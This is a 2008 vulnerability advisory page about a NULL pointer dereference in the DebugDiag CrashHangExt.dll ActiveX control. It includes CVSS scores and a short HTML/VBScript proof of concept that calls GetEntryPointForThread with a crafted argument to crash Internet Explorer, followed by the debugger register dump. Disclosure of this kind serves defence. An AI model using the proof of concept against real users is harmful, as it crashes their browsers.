DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference

2008-10-30 / 2008-10-31
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Name : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd_at_gmail&#46;com Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-46f1-b24d-f60151d875a3&displaylang=en#Overview Greetz : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo Katharsis, all fron #dark-coders =+ Product of Fuzzing += This code should crash down Internet Explorer Tested on: + Windows XP SP2 (full patched) & IE 6.0 (full patched) + Windows 2000 SP 4 (full patched) & IE 6.0 (full patched) Marked as: ================================================ Class Utils GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA} Number of Interfaces: 1 Default Interface: IUtils RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False ================================================ Exploit: ~~~~~~~~~~~~~~~~~~~~~~ -----------------------code.htm-------------------------- <body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body> -----------------------code.htm-------------------------- Info ~~~~~~~~~~~~~~~~~~~~~~ EAX 00000000 ECX 0012DDDC EDX 001E98EA EBX 02C318E8 CrashHan.02C318E8 ESP 0012DD88 EBP 0012DE04 ESI 023F1FE0 EDI 00000000 EIP 02C38290 CrashHan.02C38290 IE crashes while trying to execute this line (Null pointer dereference): 02C38290 8B08 MOV ECX,DWORD PTR DS:[EAX] //www.dark-coders.pl

References:

http://www.dark-coders.pl


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top